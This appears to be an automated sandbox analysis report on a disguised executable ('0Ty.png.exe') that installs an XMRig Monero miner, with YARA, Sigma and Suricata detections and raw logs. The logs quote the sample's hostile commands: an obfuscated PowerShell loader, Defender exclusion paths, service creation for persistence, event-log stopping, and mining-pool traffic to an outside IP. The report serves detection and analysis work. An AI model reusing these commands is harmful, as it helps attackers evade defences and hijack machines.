xmrigAccording to PCrisk, XMRIG is a completely legitimate open-source application that utilizes system CPUs to mine Monero cryptocurrency. Unfortunately, criminals generate revenue by infiltrating this app into systems without users' consent. This deceptive marketing method is called "bundling".In most cases, "bundling" is used to infiltrate several potentially unwanted programs (PUAs) at once. So, there is a high probability that XMRIG Virus came with a number of adware-type applications that deliver intrusive ads and gather sensitive information.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.xmrig

Malware Configuration

No configs have been found

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000041.00000002.2939799608.000002F62B721000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
      00000041.00000002.2939799608.000002F62B6C9000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
        00000041.00000002.2936453016.0000000140001000.00000040.00000001.00020000.00000000.sdmpJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
          00000041.00000002.2936453016.0000000140001000.00000040.00000001.00020000.00000000.sdmpMacOS_Cryptominer_Xmrig_241780a1unknownunknown
          • 0x36fc08:$a1: mining.set_target
          • 0x361e30:$a2: XMRIG_HOSTNAME
          • 0x3647a8:$a3: Usage: xmrig [OPTIONS]
          • 0x361e08:$a4: XMRIG_VERSION

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          65.2.dialer.exe.140000000.0.unpackJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
            65.2.dialer.exe.140000000.0.unpackMacOS_Cryptominer_Xmrig_241780a1unknownunknown
            • 0x370008:$a1: mining.set_target
            • 0x362230:$a2: XMRIG_HOSTNAME
            • 0x364ba8:$a3: Usage: xmrig [OPTIONS]
            • 0x362208:$a4: XMRIG_VERSION
            65.2.dialer.exe.140000000.0.unpackMAL_XMR_Miner_May19_1Detects Monero Crypto Coin MinerFlorian Roth
            • 0x3b5761:$x2: * COMMANDS 'h' hashrate, 'p' pause, 'r' resume
            65.2.dialer.exe.140000000.0.unpackMALWARE_Win_CoinMiner02Detects coinmining malwareditekSHen
            • 0x3b5fd8:$s1: %s/%s (Windows NT %lu.%lu
            • 0x3b9600:$s3: \\.\WinRing0_
            • 0x3671a8:$s4: pool_wallet
            • 0x3615d8:$s5: cryptonight
            • 0x3615e8:$s5: cryptonight
            • 0x3615f8:$s5: cryptonight
            • 0x361608:$s5: cryptonight
            • 0x361620:$s5: cryptonight
            • 0x361630:$s5: cryptonight
            • 0x361640:$s5: cryptonight
            • 0x361658:$s5: cryptonight
            • 0x361668:$s5: cryptonight
            • 0x361680:$s5: cryptonight
            • 0x361698:$s5: cryptonight
            • 0x3616a8:$s5: cryptonight
            • 0x3616b8:$s5: cryptonight
            • 0x3616c8:$s5: cryptonight
            • 0x3616e0:$s5: cryptonight
            • 0x3616f8:$s5: cryptonight
            • 0x361708:$s5: cryptonight
            • 0x361718:$s5: cryptonight

            Sigma Signatures

            Change of critical system settings

            barindex
            Sigma detected: Disable power options
            Source: Process startedAuthor: Joe Security: Data: Command: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0, CommandLine: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0, CommandLine|base64offset|contains: , Image: C:\Windows\System32\powercfg.exe, NewProcessName: C:\Windows\System32\powercfg.exe, OriginalFileName: C:\Windows\System32\powercfg.exe, ParentCommandLine: "C:\Users\user\Desktop\0Ty.png.exe", ParentImage: C:\Users\user\Desktop\0Ty.png.exe, ParentProcessId: 7416, ParentProcessName: 0Ty.png.exe, ProcessCommandLine: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0, ProcessId: 7952, ProcessName: powercfg.exe

            System Summary

            barindex
            Sigma detected: Potential PowerShell Command Line Obfuscation
            Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp): Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:CKtjhrwjgtVV{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$OBERloAcZJvOcu,[Parameter(Position=1)][Type]$NRdDEuXiTK)$iAHAMhduySN=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+''+[Char](101)+''+[Char](102)+''+'l'+''+'e'+''+'c'+'t'+'e'+''+[Char](100)+''+[Char](68)+''+'e'+'l'+[Char](101)+''+[Char](103)+'a'+[Char](116)+''+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+[Char](110)+'M'+[Char](101)+'mor'+[Char](121)+''+[Char](77)+''+'o'+'dul'+'e'+'',$False).DefineType(''+[Char](77)+''+'y'+'De'+[Char](108)+''+'e'+''+[Char](103)+''+[Char](97)+'t'+'e'+''+[Char](84)+''+'y'+'p'+'e'+'',''+[Char](67)+''+[Char](108)+'as'+[Char](115)+''+[Char](44)+''+[Char](80)+''+[Char](117)+''+[Char](98)+''+'l'+''+'i'+'c,'+[Char](83)+'e'+'a'+''+[Char](108)+''+'e'+''+[Char](100)+''+[Char](44)+''+[Char](65)+'nsiC'+[Char](108)+'a'+[Char](115)+''+[Char](115)+''+','+''+'A'+''+[Char](117)+''+'t'+''+[Char](111)+'Cla'+'s'+''+'s'+'',[MulticastDelegate]);$iAHAMhduySN.DefineConstructor(''+'R'+''+'T'+''+[Char](83)+''+'p'+''+[Char](101)+'c'+[Char](105)+'a'+[Char](108)+''+[Char](78)+'a'+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](72)+''+[Char](105)+''+[Char](100)+''+[Char](101)+''+'B'+''+[Char](121)+''+[Char](83)+''+[Char](105)+'g'+[Char](44)+'P'+[Char](117)+''+'b'+''+[Char](108)+'i'+[Char](99)+'',[Reflection.CallingConventions]::Standard,$OBERloAcZJvOcu).SetImplementationFlags(''+'R'+'u'+'n'+''+[Char](116)+''+[Char](105)+''+[Char](109)+''+[Char](101)+''+','+''+[Char](77)+''+'a'+''+[Char](110)+''+[Char](97)+'ged');$iAHAMhduySN.DefineMethod('I'+[Char](110)+'v'+'o'+''+[Char](107)+'e',''+[Char](80)+'ub'+'l'+''+[Char](105)+''+[Char](99)+''+[Char](44)+''+[Char](72)+''+'i'+''+'d'+''+'e'+''+[Char](66)+''+'y'+''+'S'+''+[Char](105)+''+[Char](103)+''+[Char](44)+''+[Char](78)+''+[Char](101)+''+'w'+''+[Char](83)+''+'l'+''+[Char](111)+'t'+[Char](44)+''+[Char](86)+''+[Char](105)+'r'+[Char](116)+'u'+'a'+''+[Char](108)+'',$NRdDEuXiTK,$OBERloAcZJvOcu).SetImplementationFlags('Ru'+[Char](110)+''+[Char](116)+''+[Char](105)+''+'m'+'e'+','+''+[Char](77)+'anag'+'e'+''+'d'+'');Write-Output $iAHAMhduySN.CreateType();}$qragMIYqXnsdW=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('S'+'y'+''+'s'+'te'+[Char](109)+''+[Char](46)+''+[Char](100)+''+[Char](108)+''+[Char](108)+'')}).GetType(''+'M'+''+[Char](105)+''+[Char](99)+''+[Char](114)+'os'+[Char](111)+'f'+'t'+''+[Char](46)+''+[Char](87)+''+'i'+'n3'+[Char](50)+''+[Char](46)+''+[Char](85)+''+'n'+'s'+[Char](97)+'f'+[Char](101)+''+[Char](78)+'a'+[Char](116)+''+[Char](105)+''+[Char](118)+''+[Char](101)+''+'M'+'e'+[Char](116)+'ho'+[Char](100)+''+'s'+'');$OvDFGAtJneNnnn=$qragMIYqXnsdW.GetMethod(''+'G'+''+[Char](101)+'t'+'P'+''+[Char](114)+''+[Char](111)+'c'+[Char](65)+'d'+[Char](100)+''+[Char](114)+''+[Char](10
            Sigma detected: Potential WinAPI Calls Via CommandLine
            Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:CKtjhrwjgtVV{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$OBERloAcZJvOcu,[Parameter(Position=1)][Type]$NRdDEuXiTK)$iAHAMhduySN=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+''+[Char](101)+''+[Char](102)+''+'l'+''+'e'+''+'c'+'t'+'e'+''+[Char](100)+''+[Char](68)+''+'e'+'l'+[Char](101)+''+[Char](103)+'a'+[Char](116)+''+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+[Char](110)+'M'+[Char](101)+'mor'+[Char](121)+''+[Char](77)+''+'o'+'dul'+'e'+'',$False).DefineType(''+[Char](77)+''+'y'+'De'+[Char](108)+''+'e'+''+[Char](103)+''+[Char](97)+'t'+'e'+''+[Char](84)+''+'y'+'p'+'e'+'',''+[Char](67)+''+[Char](108)+'as'+[Char](115)+''+[Char](44)+''+[Char](80)+''+[Char](117)+''+[Char](98)+''+'l'+''+'i'+'c,'+[Char](83)+'e'+'a'+''+[Char](108)+''+'e'+''+[Char](100)+''+[Char](44)+''+[Char](65)+'nsiC'+[Char](108)+'a'+[Char](115)+''+[Char](115)+''+','+''+'A'+''+[Char](117)+''+'t'+''+[Char](111)+'Cla'+'s'+''+'s'+'',[MulticastDelegate]);$iAHAMhduySN.DefineConstructor(''+'R'+''+'T'+''+[Char](83)+''+'p'+''+[Char](101)+'c'+[Char](105)+'a'+[Char](108)+''+[Char](78)+'a'+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](72)+''+[Char](105)+''+[Char](100)+''+[Char](101)+''+'B'+''+[Char](121)+''+[Char](83)+''+[Char](105)+'g'+[Char](44)+'P'+[Char](117)+''+'b'+''+[Char](108)+'i'+[Char](99)+'',[Reflection.CallingConventions]::Standard,$OBERloAcZJvOcu).SetImplementationFlags(''+'R'+'u'+'n'+''+[Char](116)+''+[Char](105)+''+[Char](109)+''+[Char](101)+''+','+''+[Char](77)+''+'a'+''+[Char](110)+''+[Char](97)+'ged');$iAHAMhduySN.DefineMethod('I'+[Char](110)+'v'+'o'+''+[Char](107)+'e',''+[Char](80)+'ub'+'l'+''+[Char](105)+''+[Char](99)+''+[Char](44)+''+[Char](72)+''+'i'+''+'d'+''+'e'+''+[Char](66)+''+'y'+''+'S'+''+[Char](105)+''+[Char](103)+''+[Char](44)+''+[Char](78)+''+[Char](101)+''+'w'+''+[Char](83)+''+'l'+''+[Char](111)+'t'+[Char](44)+''+[Char](86)+''+[Char](105)+'r'+[Char](116)+'u'+'a'+''+[Char](108)+'',$NRdDEuXiTK,$OBERloAcZJvOcu).SetImplementationFlags('Ru'+[Char](110)+''+[Char](116)+''+[Char](105)+''+'m'+'e'+','+''+[Char](77)+'anag'+'e'+''+'d'+'');Write-Output $iAHAMhduySN.CreateType();}$qragMIYqXnsdW=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('S'+'y'+''+'s'+'te'+[Char](109)+''+[Char](46)+''+[Char](100)+''+[Char](108)+''+[Char](108)+'')}).GetType(''+'M'+''+[Char](105)+''+[Char](99)+''+[Char](114)+'os'+[Char](111)+'f'+'t'+''+[Char](46)+''+[Char](87)+''+'i'+'n3'+[Char](50)+''+[Char](46)+''+[Char](85)+''+'n'+'s'+[Char](97)+'f'+[Char](101)+''+[Char](78)+'a'+[Char](116)+''+[Char](105)+''+[Char](118)+''+[Char](101)+''+'M'+'e'+[Char](116)+'ho'+[Char](100)+''+'s'+'');$OvDFGAtJneNnnn=$qragMIYqXnsdW.GetMethod(''+'G'+''+[Char](101)+'t'+'P'+''+[Char](114)+''+[Char](111)+'c'+[Char](65)+'d'+[Char](100)+''+[Char](114)+''+[Char](10
            Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\0Ty.png.exe", ParentImage: C:\Users\user\Desktop\0Ty.png.exe, ParentProcessId: 7416, ParentProcessName: 0Ty.png.exe, ProcessCommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, ProcessId: 7428, ProcessName: powershell.exe
            Sigma detected: Powershell Defender Exclusion
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\0Ty.png.exe", ParentImage: C:\Users\user\Desktop\0Ty.png.exe, ParentProcessId: 7416, ParentProcessName: 0Ty.png.exe, ProcessCommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, ProcessId: 7428, ProcessName: powershell.exe
            Sigma detected: Uncommon Svchost Parent Process
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM, CommandLine: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: C:\Windows\System32\dllhost.exe /Processid:{cf3d95db-0758-4a82-bfdc-72f769e75e83}, ParentImage: C:\Windows\System32\dllhost.exe, ParentProcessId: 8008, ParentProcessName: dllhost.exe, ProcessCommandLine: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM, ProcessId: 920, ProcessName: svchost.exe
            Sigma detected: New Service Creation Using Sc.EXE
            Source: Process startedAuthor: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community: Data: Command: C:\Windows\system32\sc.exe create "HGLZSDMZ" binpath= "C:\ProgramData\fimdesrsuelr\weiuemyrzjra.exe" start= "auto", CommandLine: C:\Windows\system32\sc.exe create "HGLZSDMZ" binpath= "C:\ProgramData\fimdesrsuelr\weiuemyrzjra.exe" start= "auto", CommandLine|base64offset|contains: r, Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: "C:\Users\user\Desktop\0Ty.png.exe", ParentImage: C:\Users\user\Desktop\0Ty.png.exe, ParentProcessId: 7416, ParentProcessName: 0Ty.png.exe, ProcessCommandLine: C:\Windows\system32\sc.exe create "HGLZSDMZ" binpath= "C:\ProgramData\fimdesrsuelr\weiuemyrzjra.exe" start= "auto", ProcessId: 8176, ProcessName: sc.exe
            Sigma detected: Non Interactive PowerShell Process Spawned
            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\0Ty.png.exe", ParentImage: C:\Users\user\Desktop\0Ty.png.exe, ParentProcessId: 7416, ParentProcessName: 0Ty.png.exe, ProcessCommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, ProcessId: 7428, ProcessName: powershell.exe

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Sigma detected: Stop EventLog
            Source: Process startedAuthor: Joe Security: Data: Command: C:\Windows\system32\sc.exe stop eventlog, CommandLine: C:\Windows\system32\sc.exe stop eventlog, CommandLine|base64offset|contains: ), Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: "C:\Users\user\Desktop\0Ty.png.exe", ParentImage: C:\Users\user\Desktop\0Ty.png.exe, ParentProcessId: 7416, ParentProcessName: 0Ty.png.exe, ProcessCommandLine: C:\Windows\system32\sc.exe stop eventlog, ProcessId: 3704, ProcessName: sc.exe

            Suricata Signatures

            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-12-25T17:23:07.931161+010020446971A Network Trojan was detected192.168.2.44973185.209.133.2980TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-12-25T17:24:06.527059+010020510042Crypto Currency Mining Activity Detected192.168.2.44975585.209.133.2980TCP
            2024-12-25T17:25:06.831505+010020510042Crypto Currency Mining Activity Detected192.168.2.44977585.209.133.2980TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-12-25T17:23:00.307417+010028269302Crypto Currency Mining Activity Detected192.168.2.449730194.164.234.17110128TCP

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Multi AV Scanner detection for dropped file
            Source: C:\ProgramData\fimdesrsuelr\weiuemyrzjra.exeReversingLabs: Detection: 65%
            Multi AV Scanner detection for submitted file
            Source: 0Ty.png.exeVirustotal: Detection: 65%Perma Link
            Source: 0Ty.png.exeReversingLabs: Detection: 65%
            AI detected suspicious sample
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Source: C:\Windows\System32\dialer.exeCode function: 24_2_0000000140001000 CryptAcquireContextW,CryptGenRandom,CryptReleaseContext,24_2_0000000140001000
            Source: C:\Windows\System32\dialer.exeCode function: 62_2_0000000140001000 CryptAcquireContextW,CryptGenRandom,CryptReleaseContext,62_2_0000000140001000

            Bitcoin Miner

            barindex
            Yara detected Xmrig cryptocurrency miner
            Source: Yara matchFile source: dump.pcap, type: PCAP
            Source: Yara matchFile source: 65.2.dialer.exe.140000000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000041.00000002.2939799608.000002F62B721000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000041.00000002.2939799608.000002F62B6C9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000041.00000002.2936453016.0000000140001000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
            Detected Stratum mining protocol
            Source: global trafficTCP traffic: 192.168.2.4:49730 -> 194.164.234.171:10128 payload: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"47fxvmqwe3icaroaa2otudltu9sjascu5xpzwpd9clqhswjmnjwpbojh6ffsyasrgfq9kuv7nqp2sisa3c4kwuggfshb9to","pass":"","agent":"xmrig/6.21.3 (windows nt 10.0; win64; x64) libuv/1.38.0 msvc/2022","rigid":"","algo":["rx/0","cn/2","cn/r","cn/fast","cn/half","cn/xao","cn/rto","cn/rwz","cn/zls","cn/double","cn/ccx","cn-lite/1","cn-heavy/0","cn-heavy/tube","cn-heavy/xhv","cn-pico","cn-pico/tlo","cn/upx2","cn/1","rx/wow","rx/arq","rx/graft","rx/sfx","rx/keva","argon2/chukwa","argon2/chukwav2","argon2/ninja","ghostrider"]}}.
            Found strings related to Crypto-Mining
            Source: dialer.exeString found in binary or memory: cryptonight/0
            Source: 0Ty.png.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
            Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
            Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior
            Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32Jump to behavior
            Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32Jump to behavior
            Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandlerJump to behavior
            Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
            Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior
            Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32Jump to behavior
            Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32Jump to behavior
            Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandlerJump to behavior
            Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32Jump to behavior
            Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServerJump to behavior
            Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
            Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\ElevationJump to behavior
            Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
            Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior
            Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
            Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior
            Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32Jump to behavior
            Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32Jump to behavior
            Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandlerJump to behavior
            Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
            Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior
            Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32Jump to behavior
            Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32Jump to behavior
            Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandlerJump to behavior
            Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32Jump to behavior
            Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServerJump to behavior
            Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
            Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\ElevationJump to behavior
            Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
            Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior
            Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
            Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior
            Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32Jump to behavior
            Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32Jump to behavior
            Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandlerJump to behavior
            Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
            Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior
            Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32Jump to behavior
            Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32Jump to behavior
            Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandlerJump to behavior
